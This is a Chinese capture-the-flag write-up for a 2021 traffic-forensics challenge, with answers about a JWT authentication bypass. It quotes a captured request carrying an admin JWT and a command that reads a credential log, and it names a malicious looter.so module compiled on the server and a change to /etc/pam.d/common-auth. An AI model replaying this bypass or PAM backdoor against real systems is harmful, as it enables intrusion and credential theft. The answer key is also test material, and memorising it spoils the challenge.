2021隴劍杯網路安全大賽-JWT
題目描述:
昨天,單位流量系統捕獲了黑客攻擊流量,請您分析流量后進行回答:
解題思路:
2.1該網站使用了___jwt___認證方式,(如有字母請全部使用小寫)
2.2黑客繞過驗證使用的jwt中,id和username是_10087#admin_,(中間使用#號隔開,例如1#admin)
POST /exec HTTP/1.1
Host: 192.168.2.197:8081
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.197:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.197:8081/exec
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3f8coeg6hm9vf0h5lcoifmk8o5; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MTAwODcsIk1hcENsYWltcyI6eyJ1c2VybmFtZSI6ImFkbWluIn19.rurQD5RYgMrFZow8r-k7KCP13P32sF-RpTXhKsxzvD0
Connection: close
command=cat%20/tmp/.looterHTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Sat, 07 Aug 2021 05:25:45 GMT
Content-Length: 453
Connection: close
alert(“Username root\nPassword: flag{test_flag}\nUsername root\nPassword: flag{test_flag}\nUsername root\nPassword: flag{test_flag}\nUsername root\nPassword: flag{test_flag}\nUsername root\nPassword: flag{test_flag}\n”)
window.location.href="/exec";
id值jwt 解密
2.3黑客獲取webshell之后,權限是___root___?

2.4黑客上傳的惡意檔案檔案名是__1.c__,(請提交帶有檔案后綴的檔案名,例如x.txt)

2.5黑客在服務器上編譯的惡意so檔案,檔案名是__looter.so__,(請提交帶有檔案后綴的檔案名,例如x.so)

2.6黑客在服務器上修改了一個組態檔,檔案的絕對路徑為__/etc/pam.d/common-auth__,(請確認絕對路徑后再提交)

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/300183.html
標籤:其他
上一篇:網路安全絕地求生-面試題
